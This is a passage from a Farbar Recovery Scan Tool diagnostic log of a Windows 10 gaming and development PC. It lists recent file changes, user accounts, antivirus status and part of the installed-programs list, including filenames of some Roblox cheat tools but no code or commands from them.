2020-04-15 16:45 - 2020-04-15 16:45 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\sbservicetrigger.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000021520 _____ (Microsoft Corporation) C:\Windows\system32\kdhvcom.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000019968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\slcext.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sfloppy.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\icsunattend.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000015872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Custom.ps.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\pacjsworker.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\DMAlertListener.ProxyStub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\msimg32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DMAlertListener.ProxyStub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimg32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000003072 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth9.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth8.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth7.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth6.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth5.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth4.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth3.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth2.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth12.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth11.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth10.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth1.bin
2020-04-15 16:40 - 2020-03-16 23:57 - 000390656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2020-04-15 16:40 - 2020-03-16 23:56 - 000492544 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2020-04-15 14:53 - 2020-04-15 14:53 - 000000754 _____ C:\Users\ntbea\Downloads\Documents - Shortcut.lnk
2020-04-14 21:50 - 2020-04-14 21:50 - 000000098 _____ C:\Users\ntbea\Downloads\RobloxServerCrasher - Linkvertise.txt
2020-04-14 21:09 - 2020-04-20 18:46 - 000000000 ____D C:\Users\ntbea\Desktop\Files
2020-04-14 20:48 - 2020-04-14 20:48 - 000000000 ____D C:\.android
2020-04-14 20:46 - 2020-04-22 10:26 - 000000000 ____D C:\Program Files (x86)\Bonjour
2020-04-14 20:46 - 2020-04-14 20:46 - 000000000 ____D C:\Program Files\Bonjour
2020-04-14 20:16 - 2020-04-14 20:16 - 000000091 _____ C:\Users\ntbea\Desktop\Server Crash Script.txt
2020-04-14 20:10 - 2020-04-22 10:26 - 000000000 ____D C:\Program Files (x86)\LonelyScreen
2020-04-14 20:10 - 2020-04-14 20:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LonelyScreen
2020-04-14 14:36 - 2020-04-14 14:36 - 000000000 ___HD C:\$Windows.~WS
2020-04-14 12:47 - 2020-04-14 12:47 - 000000000 ____D C:\Users\ntbea\VirtualBox VMs
2020-04-14 12:46 - 2020-04-14 15:15 - 000000000 ____D C:\Users\ntbea\.VirtualBox
2020-04-14 12:46 - 2020-04-14 12:46 - 000000000 ____D C:\ProgramData\VirtualBox
2020-04-10 22:40 - 2020-04-10 22:40 - 000000063 _____ C:\Users\ntbea\Downloads\Roblox Egg Hunt 2020 - Linkvertise.txt
2020-04-07 12:59 - 2020-04-07 12:59 - 000014581 _____ C:\Users\ntbea\Downloads\Sizzling Sim Auto-Farm - Linkvertise.txt
2020-04-05 16:38 - 2020-04-05 16:38 - 000330752 _____ (Pavel Torgashov) C:\Users\ntbea\Downloads\FastColoredTextBox.dll
2020-04-05 16:37 - 2020-04-05 14:31 - 000056320 _____ () C:\Users\ntbea\Downloads\FlatUI.dll
2020-04-04 15:14 - 2020-04-22 14:41 - 000000000 ____D C:\Users\ntbea\Desktop\Synapse-X
2020-04-02 23:29 - 2020-04-02 23:29 - 000000000 ____D C:\ProgramData\A-Volute
2020-04-02 23:26 - 2020-04-02 23:26 - 000000000 ____D C:\Windows\system32\A-Volute
2020-04-01 12:08 - 2020-04-01 12:08 - 000000000 ____D C:\Users\ntbea\.idlerc
2020-04-01 10:00 - 2020-04-01 10:00 - 000000000 ____D C:\Users\ntbea\AppData\Local\pip
2020-04-01 09:56 - 2020-04-16 12:44 - 000000000 ____D C:\Users\ntbea\AppData\Local\Package Cache
2020-03-28 17:17 - 2020-03-28 17:17 - 000003304 _____ C:\Windows\system32\Tasks\StartCNBM
2020-03-28 17:17 - 2020-03-28 17:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Radeon Software
2020-03-28 17:16 - 2020-03-28 17:16 - 000000000 ____D C:\Program Files (x86)\AMD
2020-03-28 17:14 - 2020-03-18 15:16 - 062867880 _____ C:\Windows\system32\amd_comgr.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 052403624 _____ C:\Windows\SysWOW64\amd_comgr32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 004585920 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\amfrt64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 001784744 _____ C:\Windows\system32\vulkaninfo-1-999-0-0-0.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 001784744 _____ C:\Windows\system32\vulkaninfo.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 001375144 _____ C:\Windows\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 001375144 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 001243560 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\atiadlxy.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 001243560 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\atiadlxx.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 001086184 _____ C:\Windows\system32\vulkan-1-999-0-0-0.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 001086184 _____ C:\Windows\system32\vulkan-1.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000945032 _____ C:\Windows\SysWOW64\vulkan-1-999-0-0-0.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000945032 _____ C:\Windows\SysWOW64\vulkan-1.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000761256 _____ (AMD) C:\Windows\system32\atieclxx.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000574888 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\Rapidfire64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000493992 _____ C:\Windows\system32\dgtrayicon.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000491944 _____ C:\Windows\system32\GameManager64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000485800 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\Rapidfire.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000469416 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\atidemgy.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000452008 _____ C:\Windows\system32\atieah64.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000428992 _____ C:\Windows\system32\EEURestart.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000346024 _____ C:\Windows\SysWOW64\atieah32.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000345000 _____ C:\Windows\system32\clinfo.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000242088 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atig6txx.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000209320 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atigktxx.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000184744 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\mantle64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000179080 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\aticfx64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000163240 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\mantleaxl64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000159680 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atisamu64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000158432 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\aticfx32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000153512 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\mantle32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000138664 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\mantleaxl32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000136616 _____ (AMD) C:\Windows\system32\atimuixx.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000136616 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atisamu32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000135592 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000124840 _____ C:\Windows\system32\atidxx64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000121768 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000121256 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdxc64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000107432 _____ C:\Windows\SysWOW64\atidxx32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000106408 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdxc32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000091560 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\mcl64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000076200 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\mcl32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000071104 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\ati2erec.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000047528 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\RapidFireServer64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000044456 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\RapidFireServer.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000020608 _____ (Microsoft Corporation) C:\Windows\system32\detoured.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 078651304 _____ (Advanced Micro Devices Inc.) C:\Windows\system32\amdhip64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 001686840 _____ (AMD) C:\Windows\system32\amf-mft-mjpeg-decoder64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 001366192 _____ (AMD) C:\Windows\SysWOW64\amf-mft-mjpeg-decoder32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000941992 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\amdlvr64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000769448 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\amdlvr32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000554408 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdmcl64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000546568 _____ C:\Windows\system32\amdmiracast.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000484776 _____ C:\Windows\system32\amdgfxinfo64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000467368 _____ C:\Windows\system32\amdlogum.exe
2020-03-28 17:14 - 2020-03-18 15:15 - 000384424 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdmcl32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000374184 _____ C:\Windows\SysWOW64\amdgfxinfo32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000135160 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdave64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000128976 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atimpc64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000128952 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdpcom64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000120064 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdave32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000108056 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdpcom32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000108048 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atimpc32.dll
2020-03-28 17:14 - 2020-03-17 17:03 - 003471376 _____ C:\Windows\SysWOW64\atiumdva.cap
2020-03-28 17:14 - 2020-03-17 17:03 - 003437632 _____ C:\Windows\system32\atiumd6a.cap
2020-03-28 17:14 - 2020-03-17 16:59 - 000543136 _____ C:\Windows\SysWOW64\atiapfxx.blb
2020-03-28 17:14 - 2020-03-17 16:59 - 000543136 _____ C:\Windows\system32\atiapfxx.blb
2020-03-25 23:02 - 2020-04-14 14:58 - 000000000 ____D C:\ESD
2020-03-25 16:37 - 2020-03-25 16:37 - 000000000 ____D C:\Program Files (x86)\NuGet
2020-03-25 14:12 - 2020-03-25 14:13 - 001229644 _____ C:\Windows\Minidump\032520-10843-01.dmp
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-04-23 10:08 - 2019-03-19 00:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-04-23 09:29 - 2019-08-27 13:34 - 000840852 _____ C:\Windows\system32\PerfStringBackup.INI
2020-04-23 09:29 - 2019-03-19 00:50 - 000000000 ____D C:\Windows\INF
2020-04-23 09:25 - 2019-12-25 13:44 - 000003126 _____ C:\Windows\system32\Tasks\AMDInstallLauncher
2020-04-23 09:25 - 2019-12-25 13:38 - 000003112 _____ C:\Windows\system32\Tasks\AMDLinkUpdate
2020-04-23 09:25 - 2019-08-27 13:34 - 000000000 ____D C:\ProgramData\NVIDIA
2020-04-23 09:25 - 2019-08-27 13:28 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-04-23 09:24 - 2019-12-25 13:12 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2020-04-23 09:24 - 2019-03-19 00:37 - 000524288 _____ C:\Windows\system32\config\BBI
2020-04-23 09:13 - 2019-08-27 13:36 - 000000000 ____D C:\Users\ntbea\AppData\Local\Packages
2020-04-23 08:54 - 2020-02-26 00:11 - 000000000 ____D C:\Users\ntbea\AppData\Local\Discord
2020-04-23 08:53 - 2020-02-26 00:12 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\Discord
2020-04-23 08:45 - 2019-08-27 20:21 - 000000000 ____D C:\Users\ntbea\AppData\Local\CrashDumps
2020-04-23 08:45 - 2019-03-19 00:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-04-23 08:45 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\AppReadiness
2020-04-23 08:44 - 2019-08-27 13:28 - 000000000 ____D C:\Windows\system32\SleepStudy
2020-04-22 22:48 - 2019-09-04 20:47 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\.minecraft
2020-04-22 22:47 - 2019-10-14 00:08 - 000000000 ____D C:\Program Files (x86)\Minecraft Launcher
2020-04-22 22:43 - 2019-08-26 22:37 - 000000000 ____D C:\Users\ntbea\AppData\Local\PlaceholderTileLogoFolder
2020-04-22 22:23 - 2019-11-05 19:46 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\Visual Studio Setup
2020-04-22 21:57 - 2020-03-02 22:32 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2020-04-22 21:57 - 2019-09-08 16:53 - 000000252 _____ C:\Users\ntbea\AppData\LocalLow\rbxcsettings.rbx
2020-04-22 21:42 - 2020-03-12 16:53 - 000000000 ____D C:\Program Files\dotnet
2020-04-22 21:42 - 2019-08-27 13:34 - 000000000 ____D C:\Users\ntbea
2020-04-22 21:38 - 2019-11-05 19:46 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2020-04-22 20:43 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\system32\NDF
2020-04-22 14:48 - 2019-08-27 01:44 - 000000000 ____D C:\Program Files\Microsoft Office
2020-04-22 10:26 - 2020-02-02 00:02 - 000000000 ____D C:\Program Files (x86)\GhostMouse
2020-04-22 10:26 - 2019-09-07 17:56 - 000000000 ____D C:\Program Files (x86)\Photo Gallery
2020-04-22 10:26 - 2019-09-05 23:30 - 000000000 ____D C:\Program Files (x86)\Win32DiskImager
2020-04-22 10:26 - 2019-09-04 21:15 - 000000000 ____D C:\Program Files (x86)\Minecraft
2020-04-22 10:26 - 2019-08-30 16:41 - 000000000 ____D C:\Program Files (x86)\ClownfishVoiceChanger
2020-04-22 09:42 - 2019-08-27 02:03 - 000000000 ____D C:\Users\ntbea\AppData\Local\D3DSCache
2020-04-21 16:57 - 2019-11-05 19:47 - 000000000 ____D C:\Users\ntbea\AppData\Local\.IdentityService
2020-04-21 16:29 - 2020-03-18 09:26 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\SAuth
2020-04-21 14:59 - 2019-08-27 13:28 - 000000000 ____D C:\Windows\system32\Drivers\wd
2020-04-20 21:20 - 2019-08-27 13:29 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\obs-studio
2020-04-20 16:57 - 2020-02-04 20:45 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-04-20 16:57 - 2020-02-04 20:45 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-04-20 16:57 - 2020-02-04 20:45 - 000002260 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-04-20 11:08 - 2020-02-04 20:26 - 000000000 ____D C:\Users\ntbea\AppData\Local\SquirrelTemp
2020-04-20 11:05 - 2020-03-20 20:58 - 000000000 ____D C:\Program Files (x86)\Steam
2020-04-20 11:05 - 2020-01-28 18:17 - 000000000 ____D C:\Users\ntbea\AppData\Local\Badlion Client
2020-04-20 10:54 - 2019-03-19 00:52 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2020-04-19 14:21 - 2019-08-27 13:36 - 000000000 ____D C:\Users\ntbea\AppData\Local\ConnectedDevicesPlatform
2020-04-18 08:18 - 2019-08-30 23:19 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2020-04-17 17:16 - 2019-09-04 21:17 - 000114344 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2020-04-17 17:16 - 2019-09-04 21:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-04-17 17:16 - 2019-09-04 21:17 - 000000000 ____D C:\Program Files (x86)\Java
2020-04-17 17:06 - 2019-08-27 13:28 - 000300528 _____ C:\Windows\system32\FNTCACHE.DAT
2020-04-17 17:04 - 2019-10-26 15:33 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\SystemResources
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\system32\PerceptionSimulation
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\system32\migwiz
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\ShellExperiences
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\Provisioning
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\PolicyDefinitions
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\bcastdvr
2020-04-16 21:40 - 2020-01-28 18:14 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\Badlion Client
2020-04-16 21:33 - 2020-01-28 18:14 - 000000000 ____D C:\Program Files\Badlion Client
2020-04-15 22:03 - 2019-08-30 16:42 - 000000639 _____ C:\Users\ntbea\Documents\ClownfishVoiceChanger.ini
2020-04-15 16:48 - 2019-03-19 00:37 - 000000000 ____D C:\Windows\CbsTemp
2020-04-15 13:22 - 2019-08-27 13:34 - 000002363 _____ C:\Users\ntbea\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-04-15 13:22 - 2019-08-26 22:36 - 000000000 ___RD C:\Users\ntbea\OneDrive
2020-04-14 21:08 - 2019-08-27 14:04 - 000000000 ____D C:\Users\ntbea\Desktop\video files
2020-04-14 20:10 - 2019-11-17 20:43 - 000000000 ____D C:\ProgramData\Apple
2020-04-14 14:58 - 2019-08-27 14:28 - 000000000 ____D C:\Windows\Panther
2020-04-07 14:30 - 2020-03-02 22:32 - 000000000 ____D C:\Users\ntbea\AppData\Local\Roblox
2020-04-03 15:27 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\LiveKernelReports
2020-04-02 15:54 - 2020-01-27 20:30 - 000744808 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2020-04-01 15:44 - 2020-03-06 22:02 - 000000141 _____ C:\Users\ntbea\AppData\Roaming\jjv5conf.json
2020-04-01 09:45 - 2019-08-27 02:03 - 000000000 ____D C:\ProgramData\Package Cache
2020-03-28 17:17 - 2019-08-27 17:12 - 000000000 ____D C:\Program Files\AMD
2020-03-28 17:14 - 2019-12-25 13:34 - 000000000 ____D C:\AMD
2020-03-25 16:37 - 2020-03-12 16:54 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2020-03-25 16:37 - 2020-03-12 16:54 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2020-03-25 14:12 - 2020-02-17 00:30 - 2039947304 _____ C:\Windows\MEMORY.DMP
2020-03-25 14:12 - 2019-08-27 13:30 - 000000000 ____D C:\Windows\minidump
==================== Files in the root of some directories ========
2020-03-06 22:02 - 2020-04-01 15:44 - 000000141 _____ () C:\Users\ntbea\AppData\Roaming\jjv5conf.json
2019-10-06 16:47 - 2019-10-06 16:47 - 001065984 _____ () C:\Users\ntbea\AppData\Local\file__0.localstorage
2019-09-05 20:00 - 2019-09-06 20:47 - 000000128 _____ () C:\Users\ntbea\AppData\Local\PUTTY.RND
2020-03-02 20:05 - 2020-03-02 20:05 - 000007605 _____ () C:\Users\ntbea\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Addition.txt:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-04-2020
Ran by ntbea (23-04-2020 10:15:33)
Running from C:\Users\ntbea\Downloads
Windows 10 Pro Version 1909 18363.778 (X64) (2019-08-27 17:30:36)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-230749707-3925018352-439227168-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-230749707-3925018352-439227168-503 - Limited - Disabled)
Guest (S-1-5-21-230749707-3925018352-439227168-501 - Limited - Disabled)
ntbea (S-1-5-21-230749707-3925018352-439227168-1001 - Administrator - Enabled) => C:\Users\ntbea
WDAGUtilityAccount (S-1-5-21-230749707-3925018352-439227168-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
AMD Ryzen Master SDK (HKLM\...\{DBD50508-5F75-416B-995D-C42433A00944}) (Version: 2.0.0.1183 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 20.3.1 - Advanced Micro Devices, Inc.)
Application Verifier x64 External Package (HKLM\...\{10CA1677-8F02-3131-F25C-780BAB52E468}) (Version: 10.1.18362.1 - Microsoft) Hidden
Badlion Client 2.13.1 (HKLM\...\{1de14785-dd8c-5cd2-aae8-d4a376f81d78}) (Version: 2.13.1 - Badlion)
Beatz Executor 1.0 (HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\c0697f806bbfcbaa) (Version: 1.0.0.0 - Beatz Executor 1.0)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Branding64 (HKLM\...\{856DA29A-EA4A-468B-BBC2-B5F60DD75BFE}) (Version: 1.00.0002 - Advanced Micro Devices, Inc.) Hidden
ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{0243F145-076D-423A-8F77-218DC8840261}) (Version: 4.8.04119 - Microsoft Corporation) Hidden
DiagnosticsHub_CollectionService (HKLM\...\{1F3C3AAC-9F7A-47DA-A082-0ACE770041BE}) (Version: 16.1.28901 - Microsoft Corporation) Hidden
Dragon Center (HKLM-x32\...\{B252FABF-9582-4824-B02B-6D2DC93685C7}}_is1) (Version: 1.0.0.56 - MSI)
ENE IO Driver (HKLM-x32\...\{D0512FFD-6194-4D2E-967E-25B82A3322FF}) (Version: 2.0.8 - ENE TECHNOLOGY INC.) Hidden
ENE RGB HAL (HKLM\...\{87316426-A33E-41E9-942B-968E928A9A47}) (Version: 1.00.10 - Ene Tech.) Hidden
ENE_EHD_HAL (HKLM\...\{F56EC5A0-3A93-492E-882A-E036F5897CC7}) (Version: 1.00.04 - ENE TECHNOLOGY INC.) Hidden
Entity Framework 6.2.0 Tools  for Visual Studio 2019 (HKLM-x32\...\{7C2070BF-8E07-4B5F-A182-FADB0B95AB39}) (Version: 6.2.0.0 - Microsoft Corporation) Hidden
Epic Games Launcher (HKLM-x32\...\{1D4EB18B-0FEE-444E-B4D1-6F2CFBC363E6}) (Version: 1.1.267.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 81.0.4044.113 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
icecap_collection_neutral (HKLM-x32\...\{929EAD9A-42D2-4FC7-B7E6-529AAD5F6D0D}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{84EC5964-D540-4494-9043-BF7BEE37D1E1}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{16D7574C-1007-4A85-93FF-666E74AD60D2}) (Version: 16.5.29521 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{F5C67FC5-BF18-4304-9268-A971876B245A}) (Version: 16.4.29411 - Microsoft Corporation) Hidden
IntelliTraceProfilerProxy (HKLM-x32\...\{7D94CF67-6666-4111-B027-D7AB7F189F70}) (Version: 15.0.18198.01 - Microsoft Corporation) Hidden
Java 8 Update 251 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180251F0}) (Version: 8.0.2510.8 - Oracle Corporation)
Kits Configuration Installer (HKLM-x32\...\{63AAA877-5536-9481-2385-28A082100D78}) (Version: 10.1.18362.1 - Microsoft) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
